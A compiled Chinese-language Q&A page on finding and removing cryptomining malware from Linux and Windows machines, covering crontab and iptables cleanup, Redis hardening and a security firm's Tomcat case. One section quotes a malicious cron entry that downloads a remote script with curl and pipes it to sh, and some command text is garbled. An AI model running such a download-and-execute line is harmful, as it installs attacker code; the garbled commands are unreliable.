伺服器挖礦排查

1. 如何把右下角挖礦測試去除

一種是使用雲安全中心自動清理，另一種是手動清除。登錄到雲安全中心控制台左側欄，選擇威脅檢測，安全告警處理在安全告警處理列表中，找到挖礦程序，然後點處理雲安全中心安全告警處理然後根據提示一步步操作即可。

去除的方法

手動清除挖礦程序護雲盾以Linux伺服器為例，按照以下步驟排查及處理查看挖礦進程的執行PID，命令表示該進程的PID。清除挖礦進程的執行文件，在高CPU消耗的進程中定位到挖礦進程，並殺死該進程。

檢查雲伺服器的防火牆中是否存在挖礦程序的礦池地址，可疑通信地址和開放埠，命令iptablesLn執行以下命令清除惡意礦池地址vietcsysconfigiptables排查是否存在定時任務crontabl根據排查的結果，對可疑的定時任務文件進行清理，防止二次入侵。

2. 伺服器被rshim挖礦病毒攻擊後 HugePages_Total 透明大頁怎麼都清不掉 一直佔用內存 球球

問題定位及解決步驟：

1、free -m 查看內存使用狀態 ，發現free基本沒了。--> 懷疑是服務有內存泄漏，開始排查

2、使用top命令觀察，開啟的服務佔用內存量並不大，且最終文檔在一個值，且服務為java應用，內存並沒達到父jvm設置上限。按top監控佔用內存排序，加起來也不會超過物理內存總量。查看硬碟使用量，佔用20%。基本排除虛擬內存佔用過大的原因。--->排除服務內存泄漏因素，懷疑mysql和nginx，開始排查

3、因為top命令看 mysql佔用內存也再可控范圍，是否存在connection佔用過多內存，發現並不會，設置最大連接數為1000，最多也不會超過幾M。 nginx佔用一直非常小。但每次最先被kill的基本都是nginx進程。所以排查，但發現無非就是openfiles數量啥的調整。發現也一切正常。且之前niginx可以正常使用的。

4、最為費解的就是 通過free -m 查看的時候 基本全是used，cache部分很少，free基本沒有。但top上又找不到有哪些進程佔用了內存。無解

5、注意到有兩個進程雖佔用內存不多，但基本耗光了100%的cpu。開始想著佔cpu就佔了，沒占內存，現在是內存不不夠導致進程被kill的，就沒注意這點。

6、實在搞不定，重啟伺服器，重啟了所有服務，服務暫時可用，回家。在路上的時候發現又崩了。忐忑的睡覺。

7、早上起來繼續看，這次留意注意了下那兩個佔用高cpu的進程，kdevtmpfsi 和 networkservice。本著看看是啥進程的心態，網路了下。真相一目瞭然，兩個挖礦病毒。

突然後知後覺的意識到錯誤原因：

1、cpu佔用率高，正常服務使用cpu頻率較高的服務最容易最內存超標。（因為在需要使用cpu時沒cpu資源，內存大量佔用，服務瞬間崩潰），然後看top發現剛剛已經佔用內存的進程已經被kill了，所以沒發現內存有高佔用的情況。
2、後面的應用繼續使用cpu時也會發生類似情況，倒是服務一個一個逐漸被kill。

問題點基本定位好了，解決問題就相對簡單很多：
通過網路，google，常見的病毒清除步驟基本都能解決。這兩個挖礦病毒很常見，大致記錄下要點。可能所有病毒都會有這些基礎操作。

① 首先，查看當前系統中的定時任務：crontab -l
我伺服器上有四個定時下載任務 通過wget 和 curl 下載病毒文件，把異常的刪掉。要不然刪了病毒文件還是會下載下來
crontab -r，全部刪除命令（或根據需求刪除定時任務）

② 查找病毒文件 可以全部模糊搜索 清除， 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 後再使用rm -f filename 。可刪除

③ kill 病毒進程，但注意kill了可能馬上就重啟了。因為有守護進程，需要把病毒進程的守護進程也kill掉

④ 檢查是否root用戶被攻擊，可能系統配置信息被更改。

⑤ 最好能理解病毒腳本，通過看代碼看它做了些什麼。針對腳本取修復系統。

3. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

4. 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的，因為沒有解決好漏洞。
建議是重做系統，然後找護衛神給你做一下系統安全加固，把漏洞徹底堵住才有效果。

5. 無線網路挖礦會被查到嗎

無線網路挖礦會被查到的
可以查到，如果無線路由器或AP有記錄的話.
伺服器，當用戶訪問網頁時，瀏覽器就會被感染，將他們的計算機變成礦工。
利用公共無線網路將挖礦腳本注入到任何連接到該接入點的用戶的瀏覽會話中。

6. 怎樣知道電腦被挖礦

電腦異常運行緩慢，經常異常死機/卡機，什麼都沒打開但是cpu佔用率非常高，網路緩慢，出現大量網路請求。就需要去檢查一下是否中了挖，畢竟現在很流行的。

首先需要先查看計算機的耗電情況，我一般選擇安裝魯大師。這個比較方便的掌握電腦的硬體情況，看看cpu和系統的溫度很方便的。

然後再檢查啟動後的系統資源使用情況，有沒有異常和較高的內存和cpu的佔用情況。Crtl + Alt + Del 即可進入「Windows任務管理器」，「應用程序」---「進程」---「性能」，都是查看系統資源佔用狀況的。或者：用滑鼠點擊「開始」，在「運行」里輸入：msconfig，也可以進入同樣的窗口。

最後在進程里看有沒有不熟悉的進程，發現了到網上搜索一下，基本就可以確定有沒有了。

檢測電腦是否被挖礦方法
挖礦主要利用的是高級顯卡，這樣效率最高，所以我們只需要監看GPU以及CPU的使用率即可發現。回到主界面，滑鼠右鍵單擊開始按鈕，如下圖所示

2在開始右鍵菜單點擊任務管理器，如下圖所示

3進入任務管理器，先看看運行程序有無cpu使用率極高的，如下圖所示

4在任務管理器點擊性能選項卡，如下圖所示

5進入性能選項卡，點擊下面的GPU，一般有2個，分別是集成顯卡和獨立顯卡，如下圖所示

6正常情況，集成顯卡利用率很低，圖形游戲或大型繪圖軟體才會調用獨立顯卡，如下圖所示

7接著我們看獨立顯卡，默認情況下，獨立顯卡是不使用的，如果你發現游戲，工程軟體沒開，獨立顯卡利用率比較高，那就是被挖礦的，電腦正常，獨立顯卡是休息狀態，

7. 挖礦病毒怎麼排查

登錄系統查看任務管理器，查看佔用內存較大且無法關閉的進程。進程上點擊滑鼠右鍵，打開文件位置（先要在文件夾選項中選擇顯示隱藏文件及操作系文件）。此時你可能會看到有一個Systmss.exe進程和模仿操作系統的svchost.exe進程這里還可以看到一個2.bat文件，右鍵編輯打開這個文件查看，可查看到惡意進程與哪個挖礦組織通信。

通過查看系統操作日誌可分析出病毒的來源、啟動時間等信息，一般原因可能是未關閉3389埠且使用了弱密碼導致黑客遠程登錄上次病毒。

根除病毒：將病毒可執行文件Systmss.exe重命名為Systmss.exe1使病毒無法執行，此時可從任務管理器停止進程。打開注冊表編輯器刪除HKEY_LOCAL_整個目錄。

如果是Linux系統請參考：網頁鏈接

8. 網警怎麼查單位電腦挖礦

每部電腦挨個排查。
挖礦軟體會佔用電腦的大量運算資源和電力資源，而且會引起主管部門的關注。區域網內有電腦被安裝了挖礦軟體是一件讓人很頭疼的事情，對成百上千台電腦一台一台的進行排查簡直就和大海撈針一樣，需要耗費大量的時間和人力。因為區域網出口做了NAT網路地址轉換，上級部門只能檢測到公司的公網IP，所以只能靠公司內部的網管人員來排查具體的終端了。最笨的辦法就是一台電腦一台電腦的檢查，通過檢查程序列表和任務管理器來找挖礦程序。
電腦挖礦通常是指比特幣挖礦機，就是用於賺取比特幣的電腦。這類電腦一般有專業的挖礦晶元，多採用燒顯卡的方式工作，耗電量較大。用戶用個人計算機下載軟體然後運行特定演算法，與遠方伺服器通訊後可得到相應比特幣，是獲取比特幣的方式之一。

9. 江蘇率先全面排查虛擬貨幣挖礦全省用時26天全部排查完畢，是怎麼做到的

社會經濟發展越來越快，人們賺錢的手段也是越來越多，很多人通過投資虛擬貨幣賺得盆滿缽滿，但是很多炒幣的人也是從高樓上面一躍而下，結束了自己的生命，由此可以看出虛擬貨幣是存在著巨大的風險的，這一次江蘇率先全面排查虛擬貨幣挖礦，全省用時26天全部排查完畢，也是非常的大快人心的，從相關的報道中我們可以看出，這一次主要的調查方式是從IP地址來進行調查的，而且以省內虛擬貨幣挖礦活動較多的以太坊和比特幣為例，挖礦較多的城市有蘇州，徐州，南京，當地警方也是立即介入了調查。

3、下一步我國將展開怎樣的調查

從相關報道中我們可以看出，下一步江蘇省通信管理局將持續開展虛擬貨幣挖礦態勢分析，一定會嚴厲打擊挖礦形式的，希望每一名動了歪心思的人都能夠引以為戒。

10. 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。